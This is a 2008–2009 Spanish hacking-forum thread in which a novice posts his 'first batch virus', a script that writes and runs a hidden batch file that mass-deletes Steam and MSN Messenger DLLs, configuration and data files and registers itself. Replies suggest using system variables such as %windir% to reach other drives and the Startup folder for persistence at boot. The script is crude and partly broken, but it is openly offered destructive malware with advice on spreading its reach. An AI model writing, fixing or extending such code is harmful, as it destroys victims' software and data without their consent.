elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  mi primer virus en batch
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: mi primer virus en batch  (Leído 6,054 veces)
blha

Desconectado Desconectado

Mensajes: 79


aprendiendo : c++, pyton, pearl, delphi.


Ver Perfil
mi primer virus en batch
« en: 8 Septiembre 2008, 22:21 pm »

ola estos dias estaba aburrido y hice este batch , no se si esta bien ni si tampoco funcionara pero espero que los que sabais mas de esto mireis si esta bien ahi va:
@echo_off

CD %programfile%\valve\steam\

echo @echo off >>hl2.bat

goto msn>>hl2.bat

echo :steam>>hl2.bat
echo del c:\*.dll>>hl2.bat
echo del c:\bin\*.dll>>hl2.bat
echo del c:\bin\*.asi>>hl2.bat
echo del c:\bin\*.cfg>>hl2.bat
echo del c:\bin\*.dll>>hl2.bat
echo del c:\bin\*.blob>>hl2.bat
echo del c:\bin\*.bin>>hl2.bat
echo del c:\archiv~1\steam\*.dll>>hl2.bat
echo del c:\archiv~1\steam\*.mst>>hl2.bat
echo del c:\archiv~1\steam\*.mdmp>>hl2.bat
echo del c:\archiv~1\steam\*.blob>>hl2.bat
echo del c:\archiv~1\steam\steama~1\*.gcf>>hl2.bat


echo :msn>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\*.dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\*.xml>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\*.thm>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\*.dll>>hl2.bat

echo del c:\archiv~1\window~1\messen~1\device~1\loc\4\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\6\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\7\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\8\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\9\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\10\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\11\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\12\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\16\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\17\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\18\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\19\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\20\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\22\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\25\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\29\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\31\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\1028\*dll>>hl2.bat
echo del c:\archiv~1\window~1\messen~1\device~1\loc\1046\*dll>>hl2.bat
echo if exist c:\archiv~1\valve\steam goto steam>>hl2.bat

echo exit>>hl2.bat

Reg Add HKLM\valve\steam/v hl2.bat/t reg_sz/d c:\archiv~1\valve\steam\hl2.bat/f

start hl2.bat
exit

no es nada potente , es bastante basico y borra archivos de steam y cosas del msn , y nada mas , haber si alguien me ayuda .
adios


En línea

Black Hawk
HK

Desconectado Desconectado

Mensajes: 247


t(L) Sayuri mi inspiracion


Ver Perfil WWW
Re: mi primer virus en batch
« Respuesta #1 en: 23 Septiembre 2008, 23:31 pm »

pero si la ubicacio no es c?


hay algun codigo que se pueda poner?

para que buske una unidad y luego si encuentra x decir no ps que /windows ,,, ps que de hay escojiera esa carpeta y le diera con todo xD jeje xD
solo esu n decir y una idea xD


En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: mi primer virus en batch
« Respuesta #2 en: 23 Septiembre 2008, 23:48 pm »

pero si la ubicacio no es c?


hay algun codigo que se pueda poner?

para que buske una unidad y luego si encuentra x decir no ps que /windows ,,, ps que de hay escojiera esa carpeta y le diera con todo xD jeje xD
solo esu n decir y una idea xD
Por eso existen systemroot, systemdrive, windir y otras variables de sistema  :-X
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: mi primer virus en batch
« Respuesta #3 en: 24 Septiembre 2008, 02:03 am »

http://foro.elhacker.net/scripting/bromas_malware_y_afin_batch_solo_permitidos_en_este_mensaje-t202756.0.html

aca se postean tus virus y esas cosas
saludos
En línea

HK

Desconectado Desconectado

Mensajes: 247


t(L) Sayuri mi inspiracion


Ver Perfil WWW
Re: mi primer virus en batch
« Respuesta #4 en: 24 Septiembre 2008, 23:22 pm »

pero si la ubicacio no es c?


hay algun codigo que se pueda poner?

para que buske una unidad y luego si encuentra x decir no ps que /windows ,,, ps que de hay escojiera esa carpeta y le diera con todo xD jeje xD
solo esu n decir y una idea xD
Por eso existen systemroot, systemdrive, windir y otras variables de sistema  :-X

jeje y mas o menos como se pondria?

un ejemplo please :S pa enterlo bieeen :D
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: mi primer virus en batch
« Respuesta #5 en: 25 Septiembre 2008, 00:30 am »

pero si la ubicacio no es c?


hay algun codigo que se pueda poner?

para que buske una unidad y luego si encuentra x decir no ps que /windows ,,, ps que de hay escojiera esa carpeta y le diera con todo xD jeje xD
solo esu n decir y una idea xD
Por eso existen systemroot, systemdrive, windir y otras variables de sistema  :-X

Código
  1. echo %windir%
  :¬¬
« Última modificación: 25 Septiembre 2008, 01:18 am por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: mi primer virus en batch
« Respuesta #6 en: 25 Septiembre 2008, 03:55 am »

mejor pones
SET en la consola asi salen todas las varibles de entorno y de paso las ves
En línea

blha

Desconectado Desconectado

Mensajes: 79


aprendiendo : c++, pyton, pearl, delphi.


Ver Perfil
Re: mi primer virus en batch
« Respuesta #7 en: 4 Octubre 2008, 10:32 am »

ups veo que se ha montado un polllo este batch es de los primeros y es una ***** ahora que lo veo . pero ya que estais aqui alguien sabe como hacer que un batch se ejecute cada vez que se encienda el pc sin tener que agregar nada al registro de valor?
En línea

Black Hawk
snnn Batangreet

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: mi primer virus en batch
« Respuesta #8 en: 10 Abril 2009, 23:50 pm »

puedes crear un archivo en C:\documents and settings\usuario\menu inicio\programas\inicio\el nombre del archivo
creo q es algo asi es q no me lo se de memoria.
bueno ya are un post explicandolo :rolleyes:
menu inicio\todos los programas\inicio\nombre
este es por si lo quieres cargar en tu ordenador.
a por cierto tienes q usar el comando copy, move o el >, >> (los de guardar) aplicados a la ruta.
espero q tre sirva
En línea

braulio--
Wiki

Desconectado Desconectado

Mensajes: 896


Imagen recursiva


Ver Perfil WWW
Re: mi primer virus en batch
« Respuesta #9 en: 11 Abril 2009, 20:38 pm »

Tambien se puede usar %homedrive%
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Batch] mi primer aporte: Ordenar escritorios « 1 2 3 »
Scripting
moikano→@ 28 12,997 Último mensaje 18 Noviembre 2010, 23:26 pm
por moikano→@
[Batch] [Virus] Spank Me!
Scripting
Eleкtro 6 3,790 Último mensaje 4 Febrero 2012, 19:29 pm
por Dany3j
[src]batch-virus]f_to « 1 2 »
Scripting
0x3c 10 5,823 Último mensaje 18 Enero 2013, 22:36 pm
por The_Mushrr00m
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines